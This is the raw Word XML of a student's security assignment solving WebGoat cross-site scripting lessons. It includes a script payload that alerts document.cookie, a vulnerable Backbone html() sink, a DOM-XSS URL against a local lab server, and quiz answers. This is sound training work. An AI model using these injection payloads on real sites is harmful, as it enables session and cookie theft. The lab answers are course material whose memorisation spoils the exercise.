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EF9A3" w14:textId="37D97FC9" w:rsidR="00CF0327" w:rsidRPr="007F165B" w:rsidRDefault="00CF0327">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk53849117"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assignment 2</w:t>
      </w:r>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          Matteo Franzil 221214</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1D95C" w14:textId="2E0817E4" w:rsidR="00CF0327" w:rsidRPr="007F165B" w:rsidRDefault="00CF0327">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F165B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Part 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC1C8B7" w14:textId="77777777" w:rsidR="00CF0327" w:rsidRPr="00CF0327" w:rsidRDefault="00CF0327" w:rsidP="00CF0327">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exercise 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF6141" w14:textId="77777777" w:rsidR="00CF0327" w:rsidRDefault="00CF0327">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cookies are usually tied t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o each user’s session, and the server has usually no control over the tabs that the user chooses to open. As long as the user is either authenticated or recognized within a certain session, the cookie will stay the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420B48B" w14:textId="6B10F75C" w:rsidR="00CF0327" w:rsidRPr="00CF0327" w:rsidRDefault="00CF0327" w:rsidP="00CF0327">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43C060CD" wp14:editId="1A6FF8D3">
            <wp:extent cx="6120130" cy="6648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ED79" w14:textId="4CCA66CD" w:rsidR="00CF0327" w:rsidRPr="00CF0327" w:rsidRDefault="00CF0327" w:rsidP="00CF0327">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6136EC4C" w14:textId="0B32741C" w:rsidR="00CF0327" w:rsidRDefault="00CF0327">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A quick look</w:t>
      </w:r>
      <w:r w:rsidR="000007EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the first four fields reveals that there is sanitization in place preventing insertion of non-numeric characters. However, the credit card field is susceptible to XSS. This can be verified by inserting a simple </w:t>
      </w:r>
      <w:r w:rsidR="000007EF" w:rsidRPr="000007EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000007EF" w:rsidRPr="000007EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000007EF" w:rsidRPr="000007EF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="000007EF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within and verifying its contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299CFFAF" w14:textId="77777777" w:rsidR="000007EF" w:rsidRDefault="000007EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0495A61E" w14:textId="0709A82E" w:rsidR="000007EF" w:rsidRDefault="000007EF" w:rsidP="000007EF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000007EF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23294EF2" wp14:editId="58437592">
            <wp:extent cx="3683794" cy="5151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162" cy="51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14FB" w14:textId="4753D78C" w:rsidR="005903BE" w:rsidRPr="00CF0327" w:rsidRDefault="005903BE" w:rsidP="005903BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r w:rsidR="006E036D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5449C" w14:textId="02D66F58" w:rsidR="009761A8" w:rsidRDefault="00E4569C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="005903BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r w:rsidR="00C50BED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>complete the assignment, the Developer Tools window is needed in order to inspect the contents of the website. By performing a page-wide search using the</w:t>
      </w:r>
      <w:r w:rsidR="00C50BED" w:rsidRPr="00463475">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTRL-Shift-F</w:t>
      </w:r>
      <w:r w:rsidR="00C50BED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shortcut</w:t>
      </w:r>
      <w:r w:rsidR="004740B5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, one can either search for the ‘routes’ or ‘test’ keywords. A throughout inspection reveals </w:t>
      </w:r>
      <w:r w:rsidR="009761A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a Backbone JS dictionary containing a list of routes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">used </w:t>
      </w:r>
      <w:r w:rsidR="00463475">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by the website. The </w:t>
      </w:r>
      <w:r w:rsidR="00463475" w:rsidRPr="00463475">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'test/:param': '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00463475" w:rsidRPr="00463475">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>testRoute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00463475" w:rsidRPr="00463475">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidR="00463475">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>route is the one we’re looking for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57539D2B" w14:textId="77777777" w:rsidR="000A5C78" w:rsidRDefault="009761A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009761A8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F0ED97" wp14:editId="404B825B">
            <wp:extent cx="6120130" cy="51689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A51B" w14:textId="475C9DFF" w:rsidR="000A5C78" w:rsidRDefault="000A5C78" w:rsidP="008C65E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast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testRoute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function defined later </w:t>
      </w:r>
      <w:r w:rsidR="00EC7BE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">contains a series of function calls that </w:t>
      </w:r>
      <w:r w:rsidR="008C65E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00EC7BE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploitable</w:t>
      </w:r>
      <w:r w:rsidR="008C65E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The final function call contains the following code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47261A99" w14:textId="77777777" w:rsidR="008C65E9" w:rsidRPr="008C65E9" w:rsidRDefault="008C65E9" w:rsidP="008C65E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73714ADE" w14:textId="77777777" w:rsidR="008C65E9" w:rsidRPr="008C65E9" w:rsidRDefault="008C65E9" w:rsidP="008C65E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C65E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/* for testing */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C522354" w14:textId="77777777" w:rsidR="008C65E9" w:rsidRPr="008C65E9" w:rsidRDefault="008C65E9" w:rsidP="008C65E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C65E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C65E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>showTestParam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C65E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: function (param) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562230F2" w14:textId="77777777" w:rsidR="008C65E9" w:rsidRPr="008C65E9" w:rsidRDefault="008C65E9" w:rsidP="008C65E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C65E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                this.$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C65E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>el.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C65E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('.lesson-content').html('test:' + param);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C0E232" w14:textId="1BD74D0E" w:rsidR="008C65E9" w:rsidRDefault="008C65E9" w:rsidP="008C65E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C65E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3D406" w14:textId="66D9BE06" w:rsidR="008C65E9" w:rsidRDefault="008C65E9" w:rsidP="008C65E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5BCFD6" w14:textId="1B951B2E" w:rsidR="008C65E9" w:rsidRPr="008C65E9" w:rsidRDefault="008C65E9" w:rsidP="008C65E9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This code will be useful in the next exercise. For now, we can just submit the correct answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43810B9B" w14:textId="77777777" w:rsidR="008C65E9" w:rsidRDefault="000007EF" w:rsidP="008C65E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000007EF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FDC65B3" wp14:editId="3C2EAD87">
            <wp:extent cx="6120130" cy="120840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5E9" w:rsidRPr="008C65E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4539F95E" w14:textId="327E90D2" w:rsidR="008C65E9" w:rsidRPr="00CF0327" w:rsidRDefault="008C65E9" w:rsidP="008C65E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r w:rsidR="006E036D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885AAC1" w14:textId="1D44A9C0" w:rsidR="000007EF" w:rsidRDefault="008C65E9" w:rsidP="008C65E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To complete the assignment</w:t>
      </w:r>
      <w:r w:rsidR="006E036D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the route and functions explained above must be exploited in order to obtain a JSON payload. The correct way to retrieve such a payload is by using a correctly-escaped URL like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E30F1DB" w14:textId="35DE5888" w:rsidR="006E036D" w:rsidRDefault="007F165B" w:rsidP="006E036D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:anchor="test/%3Cscript%3Ewebgoat.customjs.phoneHome()%3C%2Fscript%3E" w:history="1">
        <w:r w:rsidR="003A3748" w:rsidRPr="0085776B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://192.168.199.129:8080/WebGoat/start.mvc#test/%3Cscript%3Ewebgoat.customjs.phoneHome()%3C%2Fscript%3E</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="777D10F9" w14:textId="2DF722D6" w:rsidR="000440EB" w:rsidRPr="003E22B8" w:rsidRDefault="003E22B8" w:rsidP="000440EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F156DE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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028545A" wp14:editId="783255B3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>206248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="86233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3748">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This returns </w:t>
      </w:r>
      <w:r w:rsidR="00F156DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADE1666" w14:textId="703DE416" w:rsidR="003E22B8" w:rsidRDefault="000440EB" w:rsidP="006E036D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inserting the number in the field completes the assignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62624B40" w14:textId="5DEAD39D" w:rsidR="003E22B8" w:rsidRPr="00CF0327" w:rsidRDefault="003E22B8" w:rsidP="003E22B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="007F165B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFB1774" w14:textId="6C0EB4F6" w:rsidR="003E22B8" w:rsidRDefault="003E22B8" w:rsidP="006E036D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The responses to the multiple-choice questionnaire are showed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154AD25F" w14:textId="77777777" w:rsidR="003E22B8" w:rsidRDefault="003E22B8" w:rsidP="006E036D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E22B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1) 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FE59F3" w14:textId="77777777" w:rsidR="003E22B8" w:rsidRDefault="003E22B8" w:rsidP="006E036D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E22B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2) 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68796CD8" w14:textId="77777777" w:rsidR="003E22B8" w:rsidRDefault="003E22B8" w:rsidP="006E036D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E22B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3) 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9B7598" w14:textId="77777777" w:rsidR="003E22B8" w:rsidRDefault="003E22B8" w:rsidP="006E036D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E22B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4) 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1D514" w14:textId="77777777" w:rsidR="003E22B8" w:rsidRDefault="003E22B8" w:rsidP="003E22B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E22B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5) 4</w:t>
      </w:r>
      <w:r w:rsidRPr="003E22B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75025C96" w14:textId="75766E0D" w:rsidR="003E22B8" w:rsidRPr="003E22B8" w:rsidRDefault="003E22B8" w:rsidP="003E22B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E22B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Part </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A6E797" w14:textId="323209EB" w:rsidR="003E22B8" w:rsidRPr="00CF0327" w:rsidRDefault="003E22B8" w:rsidP="003E22B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF0327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r w:rsidR="00C3759F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
